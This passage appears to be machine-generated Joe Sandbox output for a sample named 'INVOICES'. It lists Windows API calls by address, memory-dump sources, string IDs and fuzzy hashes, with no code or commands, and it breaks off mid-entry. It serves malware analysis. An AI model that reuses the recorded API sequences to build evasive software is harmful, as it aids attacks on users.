                                                                                                                                    • Part of subcall function 00758CA8: __getptd_noexit.LIBCMT ref: 00758CA8
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00757054
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 0075708A
                                                                                                                                  • __gmtime64_s.LIBCMT ref: 007570A7
                                                                                                                                  • __allrem.LIBCMT ref: 007570FD
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00757119
                                                                                                                                  • __allrem.LIBCMT ref: 00757130
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0075714E
                                                                                                                                  • __allrem.LIBCMT ref: 00757165
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00757183
                                                                                                                                  • __invoke_watson.LIBCMT ref: 007571F4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 384356119-0
                                                                                                                                  • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                  • Instruction ID: f831bc02b25e099952f868163b6f86eb376b0ba63376a1280f2ff2efae2ed5db
                                                                                                                                  • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                  • Instruction Fuzzy Hash: FB710771A00B16EBE7189E39DC46BDAB3A8AF51325F14422AFC15D72C1EBB8D904C7D0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 0079283A
                                                                                                                                  • GetMenuItemInfoW.USER32(007F5890,000000FF,00000000,00000030), ref: 0079289B
                                                                                                                                  • SetMenuItemInfoW.USER32(007F5890,00000004,00000000,00000030), ref: 007928D1
                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 007928E3
                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00792927
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00792943
                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 0079296D
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 007929B2
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007929F8
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00792A0C
                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00792A2D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 5cd3fcee4f484909c46db333e9fcada95ee8ca2d9abbdbc45b9761036a581ba7
• Instruction ID: 2af3320fac1fa6fe13b98de2b096295316954b738b06933b2429a678a9d4956e
• Opcode Fuzzy Hash: 5cd3fcee4f484909c46db333e9fcada95ee8ca2d9abbdbc45b9761036a581ba7
• Instruction Fuzzy Hash: C661A1B1900249BFDF21EF64EC88EBE7BB8FB05314F144159E842A7252D739AD06DB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007B6FD7
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007B6FDA
• GetWindowLongW.USER32(?,000000F0), ref: 007B6FFE
• _memset.LIBCMT ref: 007B700F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007B7021
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007B7099
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 93efaf815f82ae341a299d99736e2de9ffcaec09f29b79256dd55a8bcb01341f
• Instruction ID: 5111ae54e13fb408234cc1154925b497d1bb6631f83c72417e898d70a7dfccb6
• Opcode Fuzzy Hash: 93efaf815f82ae341a299d99736e2de9ffcaec09f29b79256dd55a8bcb01341f
• Instruction Fuzzy Hash: C7616975A00208EFDB10DFA8CC85FEE77B8EB49710F10415AFA15AB2A1D778AD41DB64
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00786F15
• SafeArrayAllocData.OLEAUT32(?), ref: 00786F6E
• VariantInit.OLEAUT32(?), ref: 00786F80
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00786FA0
• VariantCopy.OLEAUT32(?,?), ref: 00786FF3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00787007
• VariantClear.OLEAUT32(?), ref: 0078701C
• SafeArrayDestroyData.OLEAUT32(?), ref: 00787029
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00787032
• VariantClear.OLEAUT32(?), ref: 00787044
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0078704F
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 8eb846afda94478975826a0a10d12a7ecd18d45cb674c8f37d5ec88dc530dac9
• Instruction ID: c4c5f2edf3830e0cfe8869c7f541066e99e03ccece090fe575cf01816da045a6
• Opcode Fuzzy Hash: 8eb846afda94478975826a0a10d12a7ecd18d45cb674c8f37d5ec88dc530dac9
• Instruction Fuzzy Hash: 11414F35900219EFCB04EF64DC48EAEBBB9EF48714F108169E956E7261CB78E945CB90
APIs
  • Part of subcall function 00739997: __itow.LIBCMT ref: 007399C2
  • Part of subcall function 00739997: __swprintf.LIBCMT ref: 00739A0C
• CoInitialize.OLE32 ref: 007A8518
• CoUninitialize.COMBASE ref: 007A8523
• CoCreateInstance.COMBASE(?,00000000,00000017,007C2BEC,?), ref: 007A8583
• IIDFromString.COMBASE(?,?), ref: 007A85F6
• VariantInit.OLEAUT32(?), ref: 007A8690
• VariantClear.OLEAUT32(?), ref: 007A86F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: 12e0cb7a3008ca26831b5c59ab39e347ea8a3bd4d32f48c3c27d63a7f78c9614
• Instruction ID: 343bd68f2a21bcff5602c4d9ce34b084af6cc91ec9476f77957ce85fa922e20d
• Opcode Fuzzy Hash: 12e0cb7a3008ca26831b5c59ab39e347ea8a3bd4d32f48c3c27d63a7f78c9614
• Instruction Fuzzy Hash: 21618E70608301EFD750DF24C849F5ABBE8AF8A714F144A19F9859B292DB78ED44CB93
APIs
• WSAStartup.WS2_32(00000101,?), ref: 007A58A9
• inet_addr.WS2_32(?), ref: 007A58EE
• gethostbyname.WS2_32(?), ref: 007A58FA
• IcmpCreateFile.IPHLPAPI ref: 007A5908
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007A5978
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007A598E
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 007A5A03
• WSACleanup.WS2_32 ref: 007A5A09
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: ba550d49bce4f6f6b3c16be20284b05e1b824463655b80c58a08b4355b87f941
• Instruction ID: d1a59ae76e2bc7a70829a919fef1ad5056d42cf0f0b23021de3d0633d664f7e6
• Opcode Fuzzy Hash: ba550d49bce4f6f6b3c16be20284b05e1b824463655b80c58a08b4355b87f941
• Instruction Fuzzy Hash: 66516331604700EFD710AF24CC49B2A77E4EF89720F148669F995DB2A1DB78ED04DB55
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0079B55C
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0079B5D2
• GetLastError.KERNEL32 ref: 0079B5DC
• SetErrorMode.KERNEL32(00000000,READY), ref: 0079B649
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 5c0f264aae809f98f19c66f6f63c1a4b1b389952bd73783635664749449dcfd9
• Instruction ID: d36cb43256bd878919797955e5cfc461241e19cce01b7fe952e433bef84536ae
• Opcode Fuzzy Hash: 5c0f264aae809f98f19c66f6f63c1a4b1b389952bd73783635664749449dcfd9
• Instruction Fuzzy Hash: A931A3B5A00209EFDB10DFA9ED89EADB7B4EF48700F144125E505DB292DB78A901C751
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007892D6
• GetDlgCtrlID.USER32 ref: 007892E1
• GetParent.USER32 ref: 007892FD
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00789300
• GetDlgCtrlID.USER32(?), ref: 00789309
• GetParent.USER32(?), ref: 00789325
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00789328
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
• Opcode ID: 432e668488619246219075d32b00e0e9fd87b81c59335dbef6b596fdcfa9c31a
• Instruction ID: 4c976f294271013c16944327f23aac0bacf8f2deb86d3318b2474608b312a4d7
• Opcode Fuzzy Hash: 432e668488619246219075d32b00e0e9fd87b81c59335dbef6b596fdcfa9c31a
• Instruction Fuzzy Hash: FD21C170A40204FBDF04AB65CC89EFEBB64EF59310F144256F961972E2DB7D5815DB20
APIs
  • Part of subcall function 00737F41: _memmove.LIBCMT ref: 00737F82
  • Part of subcall function 0078AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0078AEC7
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007893BF
• GetDlgCtrlID.USER32 ref: 007893CA
• GetParent.USER32 ref: 007893E6
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007893E9
• GetDlgCtrlID.USER32(?), ref: 007893F2
                                                                                                                                  • GetParent.USER32(?), ref: 0078940E
                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00789411
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                  • API String ID: 1536045017-1403004172
                                                                                                                                  • Opcode ID: aa4fd4d065e9fb1bc41b7d71df13a29ef5a9e965ffee17053a09431daed38b6d
                                                                                                                                  • Instruction ID: 86de1c605919f670f91b8491707608ec4dd532e3cfe38dc66d054749a4b15c0a
                                                                                                                                  • Opcode Fuzzy Hash: aa4fd4d065e9fb1bc41b7d71df13a29ef5a9e965ffee17053a09431daed38b6d
                                                                                                                                  • Instruction Fuzzy Hash: 8821B374A40204FBDF04ABA5CC89EFEBB78EF59300F144166F911971A2DB7D591ADB20
                                                                                                                                  APIs
                                                                                                                                  • GetParent.USER32 ref: 00789431
                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00789446
                                                                                                                                  • _wcscmp.LIBCMT ref: 00789458
                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007894D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                  • API String ID: 1704125052-3381328864
                                                                                                                                  • Opcode ID: 497d8e74ac60864e3942d7ec500a39dd2668e91f5f8bc845733242ac81bd5ffd
                                                                                                                                  • Instruction ID: 7aa0cac1c3d88ddef8334cba1eb9d0d05bafa8965ca8b87edd9fc6ffac570320
                                                                                                                                  • Opcode Fuzzy Hash: 497d8e74ac60864e3942d7ec500a39dd2668e91f5f8bc845733242ac81bd5ffd
                                                                                                                                  • Instruction Fuzzy Hash: FA110A76288386F9F6143624AC0BDF7739C8F05775B204126FE0CA40F2FAAE68578754
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 007A89EC
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 007A8A19
                                                                                                                                  • CoUninitialize.COMBASE ref: 007A8A23
                                                                                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 007A8B23
                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 007A8C50
                                                                                                                                  • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002,?,00000001,007C2C0C), ref: 007A8C84
                                                                                                                                  • CoGetObject.OLE32(?,00000000,007C2C0C,?), ref: 007A8CA7
                                                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 007A8CBA
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007A8D3A
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 007A8D4A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2395222682-0
                                                                                                                                  • Opcode ID: 4847b649f1e07a7387a6af2d243260ea007e40f09f13756c33faac918e64f1e7
                                                                                                                                  • Instruction ID: 777195d7ef64bb154f9a62cbec264592b9dd88524fbd7020f939d4ff3d4632c9
                                                                                                                                  • Opcode Fuzzy Hash: 4847b649f1e07a7387a6af2d243260ea007e40f09f13756c33faac918e64f1e7
                                                                                                                                  • Instruction Fuzzy Hash: C6C135B1604305AFD740DF28C884A2BB7E9FF89748F004A5DF58A9B251DB75ED05CB62
                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00797B15
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafeVartype
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1725837607-0
                                                                                                                                  • Opcode ID: 48ca3266dbaf60dfb1221869a13b625aa27a2a0bad5c4ff6b507635b2d8969f1
                                                                                                                                  • Instruction ID: 67b2662719df0a059274de3ed1731a44fb8cbdd42c49ef38a284bb110b2b9687
                                                                                                                                  • Opcode Fuzzy Hash: 48ca3266dbaf60dfb1221869a13b625aa27a2a0bad5c4ff6b507635b2d8969f1
                                                                                                                                  • Instruction Fuzzy Hash: D6B1A071A28219DFDF14DF94E885BBEB7B4FF49321F204469E500EB291D738A945CBA0
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00791521
                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00790599,?,00000001), ref: 00791535
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0079153C
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 0079154B
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0079155D
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 00791576
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00790599,?,00000001), ref: 00791588
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915CD
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915E2
                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00790599,?,00000001), ref: 007915ED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                  • Opcode ID: 180a51ce0b7720833d35dfc27673cc80bdafa7ebfceea67d84e8efcedb43f483
                                                                                                                                  • Instruction ID: 6f355b4e7c19387f74550821e2f0d3ed5f71fe59fc637aab8c338b7f42f6e4c6
                                                                                                                                  • Opcode Fuzzy Hash: 180a51ce0b7720833d35dfc27673cc80bdafa7ebfceea67d84e8efcedb43f483
                                                                                                                                  • Instruction Fuzzy Hash: 4031BF71900205BFEF10AF54FC48FB937AAAB94315F52C126F906C61A0DB7C9D60CB68
                                                                                                                                  APIs
                                                                                                                                  • EnumChildWindows.USER32(?,0078A844), ref: 0078A782
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
